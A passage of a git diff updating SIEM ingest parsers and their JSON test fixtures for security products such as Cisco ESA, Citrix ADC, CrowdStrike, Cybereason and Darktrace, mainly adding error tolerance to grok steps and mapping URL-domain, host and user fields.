b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/CatoNetworks/cato-sase/ingest/parser.yml b/CatoNetworks/cato-sase/ingest/parser.yml index c3559d563..73f02ca34 100644 --- a/CatoNetworks/cato-sase/ingest/parser.yml +++ b/CatoNetworks/cato-sase/ingest/parser.yml @@ -19,6 +19,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_tactics}}" output_field: message pattern: '%{DATA:tactic_name_1} \(%{DATA:tactic_id_1}\)\, %{DATA:tactic_name_2} \(%{DATA:tactic_id_2}\)' @@ -28,6 +29,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_techniques}}" output_field: message pattern: '%{DATA:technique_name_1} \(%{DATA:technique_id_1}\)\, %{DATA:technique_name_2} \(%{DATA:technique_id_2}\)' diff --git a/Cisco/cisco-esa/_meta/fields.yml b/Cisco/cisco-esa/_meta/fields.yml index 144a3c222..3ea23bd6f 100644 --- a/Cisco/cisco-esa/_meta/fields.yml +++ b/Cisco/cisco-esa/_meta/fields.yml @@ -121,6 +121,11 @@ cisco.esa.url: name: cisco.esa.url type: keyword +cisco.esa.url_domain: + description: '' + name: cisco.esa.url_domain + type: keyword + email.attachments: description: A list of objects describing the attachment files sent along with an email message diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 67b76402f..38469cd70 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -32,6 +32,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.ExternalMsgID}}" output_field: message pattern: "<%{MESSAGE_ID}>|%{MESSAGE_ID}" @@ -42,6 +43,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.duser}}" output_field: message pattern: "%{GREEDYDATA:duser_name}@%{GREEDYDATA:duser_domain}" @@ -50,6 +52,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.suser}}" output_field: message pattern: "%{GREEDYDATA:suser_name}@%{GREEDYDATA:suser_domain}" @@ -67,6 +70,7 @@ pipeline: external: name: dict.parse properties: + output_field: message input_field: > {{ parsed_event.message.ESAURLDetails }} @@ -209,11 +213,6 @@ stages: {% endif %} {% endif %} {%- endfor %}] - cisco.esa.url: >- - [{% for url, details in dict(json_event_url_details.message).items() %} - "{% if details.get('ExpandedUrl') is not none %}{{ details.ExpandedUrl }}{% else %}{{ url }}{% endif %}" - {% if not loop.last %},{% endif %} - {% endfor %}] url.domain: "{{parsed_event.message.EAURLDetails}}" cisco.esa.delivery.connection_id: "{{parsed_event.message.ESADCID}}" cisco.esa.injection.connection_id: "{{parsed_event.message.ESAICID}}" @@ -232,6 +231,19 @@ stages: cisco.esa.helo.ip: "{{parsed_event.message.ESAHeloIP}}" filter: "{{parsed_event.message.ESAHeloIP | is_ipaddress}}" + - set: + cisco.esa.url_domain: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url.replace('https://','').replace('http://','').split('/')[0]}}", "{{ details.ExpandedUrl.replace('https://','').replace('http://','').split('/')[0] }}"{% else %}"{{ url.replace('https://','').replace('http://','').split('/')[0] }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + cisco.esa.url: >- + [{% for url, details in json_event_url_details.message.items() %} + {% if details.get('ExpandedUrl') is not none %}"{{url}}", "{{ details.ExpandedUrl }}"{% else %}"{{ url }}"{% endif %} + {% if not loop.last %},{% endif %} + {% endfor %}] + filter: "{{json_event_url_details.message | length > 0}}" + - set: cisco.esa.helo.domain: "{{parsed_event.message.ESAHeloDomain}}" cisco.esa.sender_group: "{{parsed_event.message.ESASenderGroup}}" diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 56ac98c83..ce0d1d1b3 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -58,6 +58,10 @@ "url": [ "http://schemas.microsoft.com/office/2004/12/omml", "http://www.w3.org/TR/REC-html40" + ], + "url_domain": [ + "schemas.microsoft.com", + "www.w3.org" ] } }, diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index afb99f16d..4dbc8fa48 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -61,6 +61,10 @@ "url": [ "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" + ], + "url_domain": [ + "bce-demo.appc.cisco.com", + "mandrill.appc.cisco.com" ] } }, diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 553425b45..46ca9ebb4 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -55,6 +55,13 @@ "url": [ "https://facebook.com/u/john.doe", "https://tiktok.com", + "https://tinyurl.es/tbdra", + "www.twitter.com" + ], + "url_domain": [ + "facebook.com", + "tiktok.com", + "tinyurl.es", "www.twitter.com" ] } diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 29716af19..b77951dcf 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,8 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [] + } } }, "email": { diff --git a/Cisco/cisco-ios/ingest/parser.yml b/Cisco/cisco-ios/ingest/parser.yml index dace57b15..84cce9666 100644 --- a/Cisco/cisco-ios/ingest/parser.yml +++ b/Cisco/cisco-ios/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{LINEPROTO}|%{LINK}" custom_patterns: @@ -24,6 +25,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{SEC_LOGIN_SUCCESS}|%{SYS_LOGIN_FAILURE}|%{SYS_LOGOUT}|%{SYS_TTY_EXPIRE_TIMER}" custom_patterns: @@ -34,6 +36,7 @@ pipeline: filter: '{{parsed_event.message.facility in ["SEC_LOGIN", "SYS"]}}' - name: parsed_description external: + raise_errors: false name: grok.match properties: input_field: parsed_event.message.description diff --git a/Cisco/cisco-nx-os/ingest/parser.yml b/Cisco/cisco-nx-os/ingest/parser.yml index 5b8fe2aee..b9f586e96 100644 --- a/Cisco/cisco-nx-os/ingest/parser.yml +++ b/Cisco/cisco-nx-os/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ETHPORT_IF_DOWN}|%{ETHPORT_IF_UP}|%{ETHPORT_IF}|%{ETHPORT_CONTROL}|%{ETHPORT_LAN}|%{ETHPORT_TRANSCEIVER}|%{ETHPORT_CHANNEL}" custom_patterns: @@ -30,6 +31,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{PAM_MESSAGE}|%{FILE_OPEN_FAILURE}" custom_patterns: @@ -42,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{VSHD_CONFIG}|%{VSHD_CMD_EXEC}" custom_patterns: @@ -53,6 +56,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ARP_DUP}" custom_patterns: diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 9c6c377a7..6fead398e 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -90,7 +90,7 @@ pipeline: CIPHER_SUITE: '"?"?[\w\-\.]+"?"?' - name: set_audit_log_fields - filter: '{{not original.message.startswith("CEF")}}' + filter: '{{not original.message.startswith("CEF") and parse_audit_header.message.type not in ["AAATM"]}}' - name: set_connection_log_fields filter: "{{ parse_audit_header.message.type == 'TCP' }}" @@ -105,7 +105,7 @@ pipeline: filter: "{{ parse_audit_header.message.type == 'SSLLOG' }}" - name: set_other_log_fields - filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP'] }}" + filter: "{{ parse_audit_header.message.type not in ['SSLVPN', 'SSLLOG', 'TCP', 'AAATM'] }}" stages: set_cef_header_fields: @@ -113,17 +113,21 @@ stages: - set: event.kind: "alert" event.dataset: "alert" + - set: observer.vendor: "{{parsed_event.message.DeviceVendor}}" observer.product: "{{parsed_event.message.DeviceProduct}}" observer.version: "{{parsed_event.message.DeviceVersion}}" + - set: source.ip: "{{parsed_event.message.src}}" source.port: "{{parsed_event.message.spt}}" + - set: event.reason: "{{parsed_event.message.msg}}" event.action: "{{parsed_event.message.act}}" event.category: ["network"] + - set: url.original: "{{parsed_event.message.request}}" - set: diff --git a/Citrix/citrix-adc/tests/test_aaatm.json b/Citrix/citrix-adc/tests/test_aaatm.json index 8db673e24..abc914658 100644 --- a/Citrix/citrix-adc/tests/test_aaatm.json +++ b/Citrix/citrix-adc/tests/test_aaatm.json @@ -4,20 +4,12 @@ }, "expected": { "message": "09/29/2023:07:40:56 GMT ADC 0-PPE-1 : default AAATM Message 1111111111 0 : \"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "event": { - "category": [ - "network" - ], - "code": "Message", - "dataset": "audit_aaatm", - "reason": "\"AAA JSON-PARSE: ns_aaa_json_parser_StartElementHandler: NAME_VAL state, multi valued attribute start 'ConnectionId' seen\"", - "type": [ - "connection" - ] - }, - "@timestamp": "2023-09-29T07:40:56Z", - "observer": { - "name": "ADC" + "sekoiaio": { + "intake": { + "parsing_warnings": [ + "No fields extracted from original event" + ] + } } } } \ No newline at end of file diff --git a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml index f5da81755..5d0069c0a 100644 --- a/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml +++ b/CrowdStrike/crowdstrike-telemetry/ingest/parser.yml @@ -177,9 +177,9 @@ stages: - set: "event.action": "{{parsed_event.message.event_simpleName}}" - "process.command_line": "{{parsed_event.message.CommandLine}}" + "process.command_line": "{{parsed_event.message.CommandLine or parsed_event.message.ContextBaseFileName}}" "process.executable": "{{parsed_event.message.ImageFileName}}" - "process.name": "{{parsed_event.message.ImageFileName | basename}}" + "process.name": "{{parsed_event.message.ImageFileName | basename or parsed_event.message.ContextBaseFileName}}" "process.thread.id": "{{parsed_event.message.SourceThreadId | int}}" "process.parent.name": "{{parsed_event.message.ParentBaseFileName}}" "process.parent.pid": "{{parsed_event.message.ParentProcessId}}" diff --git a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json index 82baec896..01e9a933f 100644 --- a/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json +++ b/CrowdStrike/crowdstrike-telemetry/tests/telemetry_event_26.json @@ -33,6 +33,10 @@ "platform": "win" } }, + "process": { + "command_line": "svchost.exe", + "name": "svchost.exe" + }, "related": { "ip": [ "4.3.2.1" diff --git a/CybeReason/malop-json/_meta/manifest.yml b/CybeReason/malop-json/_meta/manifest.yml index 90a4a3f95..3cd3f3080 100644 --- a/CybeReason/malop-json/_meta/manifest.yml +++ b/CybeReason/malop-json/_meta/manifest.yml @@ -1,7 +1,7 @@ uuid: 9f89b634-0531-437b-b060-a9d9f2d270db name: Cybereason EDR slug: cybereason-malop-json -automation_connector_uuid: ff092b32-68dc-11ee-8c99-0242ac120002 +automation_connector_uuid: 8128d255-22df-4f4c-96af-ca6c1123f4cf automation_module_uuid: b96361fb-a01b-4ae7-8927-9622b9ea0acf description: >- Cybereason detect and prevent attack targeting endpoints. diff --git a/CybeReason/malop-json/ingest/parser.yml b/CybeReason/malop-json/ingest/parser.yml index 80803a753..5eb538561 100644 --- a/CybeReason/malop-json/ingest/parser.yml +++ b/CybeReason/malop-json/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.name}}" output_field: technique pattern: "%{TID:id} - %{DATA:name} : %{DATA}" @@ -61,19 +62,43 @@ stages: - set: observer.vendor: "Cybereason" observer.product: "Cybereason" + handle_malop: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.lastUpdateTime != null}}" + - set: file.name: "{{parsed_event.message.primaryRootCauseName}}" file.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "File"}}' + - set: process.name: "{{parsed_event.message.primaryRootCauseName}}" process.hash.sha1: "{{parsed_event.message.rootCauseElementHashes}}" filter: '{{parsed_event.message.rootCauseElementType == "Process"}}' + + - set: + host.os.type: "{{parsed_event.message.machines[0].get('osType', '').lower()}}" + host.name: "{{parsed_event.message.machines[0].get('displayName')}}" + host.domain: "{{parsed_event.message.machines[0].get('adDNSHostName')}}" + cybereason.malop.host.id: "{{parsed_event.message.machines[0].get('guid')}}" + cybereason.malop.host.is_online: "{{parsed_event.message.machines[0].get('connected')}}" + cybereason.malop.host.is_isolated: "{{parsed_event.message.machines[0].get('isolated')}}" + filter: "{{parsed_event.message.get('machines', []) != []}}" + + - set: + user.name: "{{parsed_event.message.users[0].get('displayName')}}" + cybereason.malop.user.id: "{{parsed_event.message.users[0].get('guid')}}" + cybereason.malop.user.is_admin: "{{parsed_event.message.users[0].get('admin')}}" + filter: "{{parsed_event.message.get('users', []) != []}}" + + - set: + user.name: '{{parsed_event.message.users[0].displayName.split("\\")[1]}}' + user.domain: '{{parsed_event.message.users[0].displayName.split("\\")[0]}}' + filter: '{{parsed_event.message.get("users", []) != [] and "\\" in parsed_event.message.users[0].get("displayName")}}' + - set: event.kind: "alert" event.category: ["malware"] @@ -88,22 +113,28 @@ stages: cybereason.malop.root_cause.type: "{{parsed_event.message.rootCauseElementType}}" cybereason.malop.root_cause.name: "{{parsed_event.message.primaryRootCauseName}}" cybereason.malop.is_edr: "{{parsed_event.message.edr}}" + - set: cybereason.malop.created_at: "{{parsed_creation_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + - set: cybereason.malop.modified_at: "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.creationTime != null}}" + - set: cybereason.malop.closed_at: "{{parsed_closing_time.datetime}}" filter: "{{parsed_event.message.malopCloseTime != null}}" + handle_model: actions: - set: "@timestamp": "{{parsed_timestamp.datetime}}" filter: "{{parsed_event.message.metadata.timestamp != null}}" + - set: cybereason.malop.id: "{{parsed_event.message.metadata.malopGuid}}" + handle_machine_model: actions: - set: @@ -118,6 +149,7 @@ stages: - set: host.os.type: "{{parsed_event.message.osType.lower()}}" filter: "{{parsed_event.message.osType != null}}" + handle_user_model: actions: - set: @@ -127,10 +159,12 @@ stages: user.name: "{{parsed_event.message.displayName}}" cybereason.malop.user.id: "{{parsed_event.message.guid}}" cybereason.malop.user.is_admin: "{{parsed_event.message.admin}}" + - set: user.name: '{{parsed_event.message.displayName.split("\\")[1]}}' user.domain: '{{parsed_event.message.displayName.split("\\")[0]}}' filter: '{{parsed_event.message.displayName != null and "\\" in parsed_event.message.displayName}}' + handle_file_suspect_model: actions: - set: diff --git a/CybeReason/malop-json/tests/test_malop.json b/CybeReason/malop-json/tests/test_malop.json index b7ad07bb9..a5df9c14f 100644 --- a/CybeReason/malop-json/tests/test_malop.json +++ b/CybeReason/malop-json/tests/test_malop.json @@ -24,6 +24,11 @@ ], "type": "CUSTOM_RULE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": true + }, "id": "11.-6654920844431693523", "is_edr": "true", "modified_at": "2022-11-20T12:02:17.625000Z", @@ -33,7 +38,17 @@ "type": "Process" }, "severity": "High", - "status": "Active" + "status": "Active", + "user": { + "id": "0.2548072792133848559", + "is_admin": true + } + } + }, + "host": { + "name": "win-cybereason", + "os": { + "type": "windows" } }, "observer": { @@ -42,6 +57,15 @@ }, "process": { "name": "cymulateagent.exe" + }, + "related": { + "user": [ + "administrator" + ] + }, + "user": { + "domain": "win-cybereason", + "name": "administrator" } } } \ No newline at end of file diff --git a/CybeReason/malop-json/tests/test_malop_detail.json b/CybeReason/malop-json/tests/test_malop_detail.json index a009d865f..532ff8e73 100644 --- a/CybeReason/malop-json/tests/test_malop_detail.json +++ b/CybeReason/malop-json/tests/test_malop_detail.json @@ -24,6 +24,11 @@ ], "type": "KNOWN_MALWARE" }, + "host": { + "id": "-576002811.1198775089551518743", + "is_isolated": false, + "is_online": false + }, "id": "11.7498520112250262440", "is_edr": "false", "modified_at": "2022-11-14T02:19:45.000000Z", @@ -33,7 +38,11 @@ "type": "File" }, "severity": "Low", - "status": "Closed" + "status": "Closed", + "user": { + "id": "0.2548072792133848559", + "is_admin": false + } } }, "file": { @@ -42,6 +51,13 @@ }, "name": "kprocesshacker.sys" }, + "host": { + "domain": "desktop-aaaaaa.example.org", + "name": "desktop-aaaaaa", + "os": { + "type": "windows" + } + }, "observer": { "product": "Cybereason", "vendor": "Cybereason" @@ -49,7 +65,14 @@ "related": { "hash": [ "adc83b19e793491b1c6ea0fd8b46cd9f32e592fc" + ], + "user": [ + "system" ] + }, + "user": { + "domain": "desktop-aaaaa", + "name": "system" } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml index f28c8ffae..92a2d9ef2 100644 --- a/Darktrace/darktrace-threat-visualizer/ingest/parser.yml +++ b/Darktrace/darktrace-threat-visualizer/ingest/parser.yml @@ -19,6 +19,8 @@ pipeline: output_field: datetime format: "%Y-%m-%d %H:%M:%S" - name: set_common_fields + - name: set_breach_devices_fields + filter: "{{json_event.message.breachDevices | length > 0}}" - name: set_aianalyst_fields filter: "{{json_event.message.log_type == 'aianalyst/incidentevents' or json_event.message.aiaScore != null}}" - name: set_modelbreaches_fields @@ -52,17 +54,15 @@ stages: observer.name: "Darktrace" observer.product: "Threat visualizer" host.ip: > - {% if json_event.message.device.ips is not in [[], Null]%} - [ - {% for ip in json_event.message.device.ips %} - {% if ip.get("ip") %} - {% if ip["ip"] | is_ipaddress %} - '{{ip["ip"]}}', - {% endif %} - {% endif %} - {% endfor %} - ] - {% endif %} + {%- set host_ips = [] -%} + {%- for ip in json_event.message.device.ips -%} + {%- if ip.get("ip") | is_ipaddress -%} + {%- set host_ips = host_ips.append(ip["ip"]) -%} + {%- endif -%} + {%- endfor -%} + {%- if host_ips | length > 0 -%} + {{ host_ips }} + {%- endif -%} set_modelbreaches_fields: actions: @@ -136,19 +136,32 @@ stages: {%- endif -%} {{filters}} - set_aianalyst_fields: + set_breach_devices_fields: actions: - set: device.id: "{{json_event.message.breachDevices[0].did}}" event.action: "{{json_event.message.breachDevices[0].title}}" - host.hostname: "{{json_event.message.breachDevices[0].hostname}}" host.id: "{{json_event.message.breachDevices[0].did}}" host.mac: "{{json_event.message.breachDevices[0].mac}}" + + - set: + host.hostname: "{{json_event.message.breachDevices[0].hostname}}" + filter: '{{not json_event.message.breachDevices[0].hostname.startswith("SaaS::")}}' + + - set: host.name: "{{json_event.message.breachDevices[0].identifier}}" - filter: "{{json_event.message.breachDevices | length > 0}}" + filter: '{{not json_event.message.breachDevices[0].identifier.startswith("SaaS::")}}' + + - set: + user.email: "{{json_event.message.breachDevices[0].hostname.split()[-1]}}" + filter: '{{json_event.message.breachDevices[0].hostname.startswith("SaaS::") and "@" in json_event.message.breachDevices[0].hostname.split()[-1]}}' + - set: host.ip: "{{json_event.message.breachDevices[0].ip}}" - filter: "{{json_event.message.breachDevices | length > 0 and (json_event.message.breachDevices[0].ip | is_ipaddress)}}" + filter: "{{json_event.message.breachDevices[0].ip | is_ipaddress}}" + + set_aianalyst_fields: + actions: - set: event.kind: "alert" event.category: "threat" diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json new file mode 100644 index 000000000..ebf8a69eb --- /dev/null +++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_2.json @@ -0,0 +1,79 @@ +{ + "input": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}" + }, + "expected": { + "message": "{\"summariser\": \"SaasHijackSummary\", \"acknowledged\": false, \"pinned\": false, \"createdAt\": 1730023348884, \"attackPhases\": [3], \"mitreTactics\": [\"privilege-escalation\"], \"title\": \"Possible Hijack of Zoom Account\", \"id\": \"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"children\": [\"204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\"], \"category\": \"critical\", \"currentGroup\": \"g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b\", \"groupCategory\": \"critical\", \"groupScore\": 21.063004966718992, \"groupPreviousGroups\": [], \"activityId\": \"da39a3ee\", \"groupingIds\": [\"3d2a2fc6\"], \"groupByActivity\": false, \"userTriggered\": false, \"externalTriggered\": false, \"aiaScore\": 93.67343783378601, \"summary\": \"The SaaS actor john.doe@example.com was observed making suspicious requests over a configured Zoom service from the IP 1.2.3.4.\\n\\nThis included requests made from unusual locations compared to the previous access locations observed from this actor and from the configured service in general.\\n\\nThough this behaviour could be the result of legitimate service usage or administration, it could also be a sign of this actor's account being hijacked by a malicious actor.\\n\\nConsequently, the security team may wish to confirm that this activity was legitimate and expected.\", \"periods\": [{\"start\": 1730023230000, \"end\": 1730023230000}], \"sender\": null, \"breachDevices\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}], \"relatedBreaches\": [{\"modelName\": \"SaaS / Access / Unusual External Source for SaaS Credential Use\", \"pbid\": 46769, \"threatScore\": 63.0, \"timestamp\": 1730023232000}], \"details\": [[{\"header\": \"SaaS User Details\", \"contents\": [{\"key\": \"SaaS account\", \"type\": \"device\", \"values\": [{\"identifier\": \"SaaS::Zoom: john.doe@example.com\", \"hostname\": \"SaaS::Zoom: john.doe@example.com\", \"ip\": null, \"mac\": null, \"subnet\": null, \"did\": 3820, \"sid\": -9}]}, {\"key\": \"Actor\", \"type\": \"string\", \"values\": [\"john.doe@example.com\"]}]}], [{\"header\": \"Agent Carrying out Suspicious Activity\", \"contents\": [{\"key\": \"Source IP\", \"type\": \"externalHost\", \"values\": [{\"hostname\": \"1.2.3.4\", \"ip\": \"1.2.3.4\"}]}, {\"key\": \"ASN\", \"type\": \"string\", \"values\": [\"AS2119 Telenor Norge AS\"]}, {\"key\": \"City\", \"type\": \"string\", \"values\": [\"Stockholm\"]}, {\"key\": \"Country\", \"type\": \"string\", \"values\": [\"Sweden\"]}]}, {\"header\": \"Summary of Activity\", \"contents\": [{\"key\": \"Time\", \"type\": \"timestampRange\", \"values\": [{\"start\": 1730023230000, \"end\": 1730023230000}]}, {\"key\": \"Suspicious properties\", \"type\": \"string\", \"values\": [\"Unusual time for activity\", \"Unusual external source for activity\"]}]}, {\"header\": \"Activity Details\", \"contents\": [{\"key\": \"Event\", \"type\": \"string\", \"values\": [\"Sign in\"]}, {\"key\": \"Number of events\", \"type\": \"integer\", \"values\": [1]}]}]], \"log_type\": \"aianalyst/incidentevents\"}", + "event": { + "category": "threat", + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-27T10:02:28.884000Z", + "darktrace": { + "threat_visualizer": { + "acknowledged": false, + "activityId": "da39a3ee", + "aiaScore": 93.67343783378601, + "attackPhases": [ + 3 + ], + "breachDevices": [ + { + "did": 3820, + "hostname": "SaaS::Zoom: john.doe@example.com", + "identifier": "SaaS::Zoom: john.doe@example.com", + "ip": null, + "mac": null, + "sid": -9, + "subnet": null + } + ], + "category": "critical", + "children": [ + "204a3642-a6f1-4ac3-85d0-add7dd0c9f9b" + ], + "currentGroup": "g204a3642-a6f1-4ac3-85d0-add7dd0c9f9b", + "externalTriggered": false, + "groupCategory": "critical", + "groupScore": 21.063004966718992, + "groupingIds": [ + "3d2a2fc6" + ], + "mitreTactics": [ + "privilege-escalation" + ], + "periods": [ + { + "end": 1730023230000, + "start": 1730023230000 + } + ], + "relatedBreaches": [ + { + "modelName": "SaaS / Access / Unusual External Source for SaaS Credential Use", + "pbid": 46769, + "threatScore": 63.0, + "timestamp": 1730023232000 + } + ], + "userTriggered": false + } + }, + "device": { + "id": "3820" + }, + "host": { + "id": "3820" + }, + "observer": { + "name": "Darktrace", + "product": "Threat visualizer" + }, + "user": { + "email": "john.doe@example.com" + } + } +} \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json index 3ba5ae570..b64c616de 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_aianalyst_without_log_type.json @@ -66,18 +66,14 @@ "id": "2635" }, "host": { - "hostname": "SaaS::AzureActiveDirectory: test@test.fr", - "id": "2635", - "name": "SaaS::AzureActiveDirectory: test@test.fr" + "id": "2635" }, "observer": { "name": "Darktrace", "product": "Threat visualizer" }, - "related": { - "hosts": [ - "SaaS::AzureActiveDirectory: test@test.fr" - ] + "user": { + "email": "test@test.fr" } } } \ No newline at end of file diff --git a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json index 781d6cce6..49512bdeb 100644 --- a/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json +++ b/Darktrace/darktrace-threat-visualizer/tests/test_anomalous_file.json @@ -158,15 +158,11 @@ } }, "host": { - "id": "16", - "ip": [] + "id": "16" }, "observer": { "name": 